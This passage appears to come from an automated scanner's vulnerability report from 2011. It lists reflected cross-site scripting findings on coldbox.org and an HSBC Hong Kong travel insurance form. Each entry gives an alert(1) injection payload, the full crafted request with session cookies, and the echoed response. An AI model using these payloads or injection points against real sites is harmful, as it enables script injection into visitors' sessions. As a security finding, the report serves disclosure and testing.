User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmc=4587041; __utmz=4587041.1314798131.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); CFID=463910; CFTOKEN=926badce727ab15b-40BB2514-F55F-48F3-D505182831D1ACFA; JSESSIONID=8430951b628c8dab2c372966775321c47463; __utma=4587041.1536497295.1314798131.1314798131.1314798131.1; __utmb=4587041

Response

HTTP/1.1 404 Page Not Found
Date: Wed, 31 Aug 2011 13:57:47 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 10745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta http
...[SNIP]...
<input type="hidden" name="refRoute" value="http://www.coldbox.org//index/cfm6ad53"><script>alert(1)</script>72c02369ab2/support/alliance" />
...[SNIP]...

4.165. http://www.coldbox.org/index.cfm/support/alliance [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.coldbox.org
Path:	/index.cfm/support/alliance

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87b3e"><script>alert(1)</script>5954b911f90 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm/support87b3e"><script>alert(1)</script>5954b911f90/alliance HTTP/1.1
Host: www.coldbox.org
Proxy-Connection: keep-alive
Referer: http://www.compknowhow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmc=4587041; __utmz=4587041.1314798131.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); CFID=463910; CFTOKEN=926badce727ab15b-40BB2514-F55F-48F3-D505182831D1ACFA; JSESSIONID=8430951b628c8dab2c372966775321c47463; __utma=4587041.1536497295.1314798131.1314798131.1314798131.1; __utmb=4587041

Response

HTTP/1.1 404 Page Not Found
Date: Wed, 31 Aug 2011 13:57:47 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 10735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta http
...[SNIP]...
<input type="hidden" name="refRoute" value="http://www.coldbox.org//support87b3e"><script>alert(1)</script>5954b911f90/alliance" />
...[SNIP]...

4.166. http://www.coldbox.org/index.cfm/support/alliance [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.coldbox.org
Path:	/index.cfm/support/alliance

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eb50"><script>alert(1)</script>c515ca69c47 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.cfm/support/alliance9eb50"><script>alert(1)</script>c515ca69c47 HTTP/1.1
Host: www.coldbox.org
Proxy-Connection: keep-alive
Referer: http://www.compknowhow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmc=4587041; __utmz=4587041.1314798131.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); CFID=463910; CFTOKEN=926badce727ab15b-40BB2514-F55F-48F3-D505182831D1ACFA; JSESSIONID=8430951b628c8dab2c372966775321c47463; __utma=4587041.1536497295.1314798131.1314798131.1314798131.1; __utmb=4587041

Response

HTTP/1.1 404 Page Not Found
Date: Wed, 31 Aug 2011 13:57:48 GMT
Server: Apache
Content-Type: text/html; charset=UTF-8
Content-Length: 10735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<meta http
...[SNIP]...
<input type="hidden" name="refRoute" value="http://www.coldbox.org//support/alliance9eb50"><script>alert(1)</script>c515ca69c47" />
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hsbc.com.hk
Path:	/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4!

Issue detail

The value of the PC_7_1_CKB_input.hidden_rf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 35e0e%3balert(1)//b81aa6338aede4970 was submitted in the PC_7_1_CKB_input.hidden_rf parameter. This input was echoed as 35e0e;alert(1)//b81aa6338aede4970 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4!?PC_7_1_CKB_WABEngineFormId=travelsurance&PC_7_1_CKB_currentPageNumber=1.1&PC_7_1_CKB_formtimestamp=131bb50c8aa&PC_7_1_CKB_input.trip_type=S&PC_7_1_CKB_input.start_day=12&PC_7_1_CKB_input.start_month=08&PC_7_1_CKB_input.start_year=2011&PC_7_1_CKB_input.start_date=20110812&PC_7_1_CKB_input.end_day=09&PC_7_1_CKB_input.end_month=08&PC_7_1_CKB_input.end_year=2012&PC_7_1_CKB_input.end_date=20120809&PC_7_1_CKB_input.peopletravelling=B&input.no_of_children=3&PC_7_1_CKB_number_of_children=false&input.is_include_rf=Y&PC_7_1_CKB_is_include_rf=false&PC_7_1_CKB_input.hidden_rf=135e0e%3balert(1)//b81aa6338aede4970&input.no_of_rf=3&PC_7_1_CKB_number_of_rf=false&PC_7_1_CKB_input.destination=2&PC_7_1_CKB_cmd_get_quote.x=32&PC_7_1_CKB_cmd_get_quote.y=13 HTTP/1.1
Host: www.hsbc.com.hk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4!
Cookie: HKWTK=1103220746.24515.0000; JSESSIONID=0000chj8giks8WFmVqJ3b5MfvrQ:12gkou1ov; HSBC_COOKIEMI=dd0a91b0-c475-11e0-8391-000708050602; SCMVisit=INSU20110811190739%2CTRIN20110811190827; DigitalMarket=INTERNAL_FIRST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E%7C%23%7CINTERNAL_LAST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 00:09:10 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Fri, 12 Aug 2011 00:10:01 GMT
Vary: Accept-Encoding
S: tkim2-hbappws51-qrim212
Content-Type: text/html; charset=UTF-8
Content-Length: 61794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
< 2; i++){
       if(trip_option[i].checked==true){
           trip_type = trip_option[i].value;
       }
   }
   if(trip_type =="S"){
       var checkRF = 135e0e;alert(1)//b81aa6338aede4970;
       var rf_html="";
       var crf_html="";
       if(checkRF==1){
           crf_html='<label class="hsbcCustomText">
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hsbc.com.hk
Path:	/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4!

Issue detail

The value of the PC_7_1_CKB_input.peopletravelling request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eed86"%3balert(1)//bce1ca0334318ecc was submitted in the PC_7_1_CKB_input.peopletravelling parameter. This input was echoed as eed86";alert(1)//bce1ca0334318ecc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4!?PC_7_1_CKB_WABEngineFormId=travelsurance&PC_7_1_CKB_currentPageNumber=1.1&PC_7_1_CKB_formtimestamp=131bb50c8aa&PC_7_1_CKB_input.trip_type=S&PC_7_1_CKB_input.start_day=12&PC_7_1_CKB_input.start_month=08&PC_7_1_CKB_input.start_year=2011&PC_7_1_CKB_input.start_date=20110812&PC_7_1_CKB_input.end_day=09&PC_7_1_CKB_input.end_month=08&PC_7_1_CKB_input.end_year=2012&PC_7_1_CKB_input.end_date=20120809&PC_7_1_CKB_input.peopletravelling=Beed86"%3balert(1)//bce1ca0334318ecc&input.no_of_children=3&PC_7_1_CKB_number_of_children=false&input.is_include_rf=Y&PC_7_1_CKB_is_include_rf=false&PC_7_1_CKB_input.hidden_rf=1&input.no_of_rf=3&PC_7_1_CKB_number_of_rf=false&PC_7_1_CKB_input.destination=2&PC_7_1_CKB_cmd_get_quote.x=32&PC_7_1_CKB_cmd_get_quote.y=13 HTTP/1.1
Host: www.hsbc.com.hk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4!
Cookie: HKWTK=1103220746.24515.0000; JSESSIONID=0000chj8giks8WFmVqJ3b5MfvrQ:12gkou1ov; HSBC_COOKIEMI=dd0a91b0-c475-11e0-8391-000708050602; SCMVisit=INSU20110811190739%2CTRIN20110811190827; DigitalMarket=INTERNAL_FIRST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E%7C%23%7CINTERNAL_LAST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 00:09:07 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Fri, 12 Aug 2011 00:09:58 GMT
Vary: Accept-Encoding
S: tkim2-hbappws51-qrim212
Content-Type: text/html; charset=UTF-8
Content-Length: 61827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
<!--
   var checkSubmit = "Beed86";alert(1)//bce1ca0334318ecc";
   var trip_type = "";
   var trip_option = document.getElementsByName("PC_7_1_CKB_input.trip_type");
   for (var i = 0; i < 2; i++){
       if(trip_option[i].checked==true){
           trip_type = trip_option[i].valu
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hsbc.com.hk
Path:	/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4!

Issue detail

The value of the PC_7_1_CKB_number_of_children request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload cc7b4%3balert(1)//9dcf24fbbae29fe73 was submitted in the PC_7_1_CKB_number_of_children parameter. This input was echoed as cc7b4;alert(1)//9dcf24fbbae29fe73 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4!?PC_7_1_CKB_WABEngineFormId=travelsurance&PC_7_1_CKB_currentPageNumber=1.1&PC_7_1_CKB_formtimestamp=131bb50c8aa&PC_7_1_CKB_input.trip_type=S&PC_7_1_CKB_input.start_day=12&PC_7_1_CKB_input.start_month=08&PC_7_1_CKB_input.start_year=2011&PC_7_1_CKB_input.start_date=20110812&PC_7_1_CKB_input.end_day=09&PC_7_1_CKB_input.end_month=08&PC_7_1_CKB_input.end_year=2012&PC_7_1_CKB_input.end_date=20120809&PC_7_1_CKB_input.peopletravelling=B&input.no_of_children=3&PC_7_1_CKB_number_of_children=falsecc7b4%3balert(1)//9dcf24fbbae29fe73&input.is_include_rf=Y&PC_7_1_CKB_is_include_rf=false&PC_7_1_CKB_input.hidden_rf=1&input.no_of_rf=3&PC_7_1_CKB_number_of_rf=false&PC_7_1_CKB_input.destination=2&PC_7_1_CKB_cmd_get_quote.x=32&PC_7_1_CKB_cmd_get_quote.y=13 HTTP/1.1
Host: www.hsbc.com.hk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4!
Cookie: HKWTK=1103220746.24515.0000; JSESSIONID=0000chj8giks8WFmVqJ3b5MfvrQ:12gkou1ov; HSBC_COOKIEMI=dd0a91b0-c475-11e0-8391-000708050602; SCMVisit=INSU20110811190739%2CTRIN20110811190827; DigitalMarket=INTERNAL_FIRST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E%7C%23%7CINTERNAL_LAST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 00:09:09 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Fri, 12 Aug 2011 00:09:59 GMT
Vary: Accept-Encoding
S: tkim2-hbappws51-qrim212
Content-Type: text/html; charset=UTF-8
Content-Length: 61794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
<!--
   var input_numberOfChildren = falsecc7b4;alert(1)//9dcf24fbbae29fe73;
   var checkSubmit = "B";
   var PC_7_1_CKB_no_of_children_list=document.getElementById("PC_7_1_CKB_no_of_children_list");

   if (checkSubmit=="C"||checkSubmit=="B"||checkSubmit=="F") {
       var html='<label
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hsbc.com.hk
Path:	/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4!

Issue detail

The value of the PC_7_1_CKB_number_of_rf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d4866%3balert(1)//7adf7fe3a9ec7b8e was submitted in the PC_7_1_CKB_number_of_rf parameter. This input was echoed as d4866;alert(1)//7adf7fe3a9ec7b8e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRHw98nNT9YOAMpHmQMXO3k76UTmp6YnJlfrB-t76AfoFuaER5d6OjgCeMQ4X/delta/base64xml/L0lJSk03dWlDU1lKSi9vQXd3QUFNWWdBQ0VJUWhDRUVJaEZLQSEvNEZHZ2RZbktKMEZSb1hmckNIZGgvN18xX0NLQi8yMC9zYS4!?PC_7_1_CKB_WABEngineFormId=travelsurance&PC_7_1_CKB_currentPageNumber=1.1&PC_7_1_CKB_formtimestamp=131bb50c8aa&PC_7_1_CKB_input.trip_type=S&PC_7_1_CKB_input.start_day=12&PC_7_1_CKB_input.start_month=08&PC_7_1_CKB_input.start_year=2011&PC_7_1_CKB_input.start_date=20110812&PC_7_1_CKB_input.end_day=09&PC_7_1_CKB_input.end_month=08&PC_7_1_CKB_input.end_year=2012&PC_7_1_CKB_input.end_date=20120809&PC_7_1_CKB_input.peopletravelling=B&input.no_of_children=3&PC_7_1_CKB_number_of_children=false&input.is_include_rf=Y&PC_7_1_CKB_is_include_rf=false&PC_7_1_CKB_input.hidden_rf=1&input.no_of_rf=3&PC_7_1_CKB_number_of_rf=falsed4866%3balert(1)//7adf7fe3a9ec7b8e&PC_7_1_CKB_input.destination=2&PC_7_1_CKB_cmd_get_quote.x=32&PC_7_1_CKB_cmd_get_quote.y=13 HTTP/1.1
Host: www.hsbc.com.hk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hsbc.com.hk/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4!
Cookie: HKWTK=1103220746.24515.0000; JSESSIONID=0000chj8giks8WFmVqJ3b5MfvrQ:12gkou1ov; HSBC_COOKIEMI=dd0a91b0-c475-11e0-8391-000708050602; SCMVisit=INSU20110811190739%2CTRIN20110811190827; DigitalMarket=INTERNAL_FIRST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E%7C%23%7CINTERNAL_LAST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 00:09:12 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Fri, 12 Aug 2011 00:10:03 GMT
Vary: Accept-Encoding
S: tkim2-hbappws51-qrim212
Content-Type: text/html; charset=UTF-8
Content-Length: 61793

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
</label>';
           var input_numberOfFriend = falsed4866;alert(1)//7adf7fe3a9ec7b8e;
           if(checkSubmit=="R"){
               document.getElementById("PC_7_1_CKB_no_of_rf_question").style.display="none";
               document.getElementById("PC_7_1_CKB_no_of_rf_question").innerHTML="";
           }else{
               docu
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hsbc.com.hk
Path:	/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4!

Issue detail

The value of the PC_7_1_CKB_input.hidden_rf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b513a%3balert(1)//55e54f10d448fe345 was submitted in the PC_7_1_CKB_input.hidden_rf parameter. This input was echoed as b513a;alert(1)//55e54f10d448fe345 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4!?PC_7_1_CKB_WABEngineFormId=travelsurance&PC_7_1_CKB_currentPageNumber=1.1&PC_7_1_CKB_formtimestamp=131bb50502e&PC_7_1_CKB_input.trip_type=S&PC_7_1_CKB_input.start_day=12&PC_7_1_CKB_input.start_month=08&PC_7_1_CKB_input.start_year=2011&PC_7_1_CKB_input.start_date=&PC_7_1_CKB_input.end_day=09&PC_7_1_CKB_input.end_month=08&PC_7_1_CKB_input.end_year=2012&PC_7_1_CKB_input.end_date=&PC_7_1_CKB_input.peopletravelling=B&input.no_of_children=3&PC_7_1_CKB_number_of_children=3&input.is_include_rf=Y&PC_7_1_CKB_is_include_rf=Y&PC_7_1_CKB_input.hidden_rf=1b513a%3balert(1)//55e54f10d448fe345&input.no_of_rf=3&PC_7_1_CKB_number_of_rf=3&PC_7_1_CKB_input.destination=2&PC_7_1_CKB_cmd_get_quote.x=30&PC_7_1_CKB_cmd_get_quote.y=12 HTTP/1.1
Host: www.hsbc.com.hk
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.hsbc.com.hk/1/2/hk/insurance/travel?pwscmd=cmd_init
Cookie: HKWTK=1103220746.24515.0000; JSESSIONID=0000chj8giks8WFmVqJ3b5MfvrQ:12gkou1ov; HSBC_COOKIEMI=dd0a91b0-c475-11e0-8391-000708050602; SCMVisit=INSU20110811190739%2CTRIN20110811190756; DigitalMarket=INTERNAL_FIRST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E%7C%23%7CINTERNAL_LAST_BANNER%7C%23%7CAMH_PFS_PWS_1108_INS_M_TRASUR_01_E

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 00:08:41 GMT
Server: IBM_HTTP_Server
Cache-Control: private
Cache-Control: max-age=60
Expires: Fri, 12 Aug 2011 00:09:31 GMT
Vary: Accept-Encoding
S: tkim2-hbappws51-qrim212
Content-Type: text/html; charset=UTF-8
Content-Length: 61786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
< 2; i++){
       if(trip_option[i].checked==true){
           trip_type = trip_option[i].value;
       }
   }
   if(trip_type =="S"){
       var checkRF = 1b513a;alert(1)//55e54f10d448fe345;
       var rf_html="";
       var crf_html="";
       if(checkRF==1){
           crf_html='<label class="hsbcCustomText">
...[SNIP]...

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.hsbc.com.hk
Path:	/1/2/!ut/p/kcxml/04_Sj9SPykssy0xPLMnMz0vM0Y_QjzKLN4o3NfMDSZnFG8Ybm-pHoggZxDsiRIL0vfV9PfJzU_UD9AtyQyPKHR0VAYf21ew!/delta/base64xml/L0lDU0lKQ1RPN29na21DU1Evb0tvUUFBSVFnakZJQUFRaENFSVFqR0VKemdBIS80SkZpQ28wZWgxaWNvblFWR2hkLXNJZDJFQSEhLzdfMV9DS0IvMS9zYS4!

Issue detail

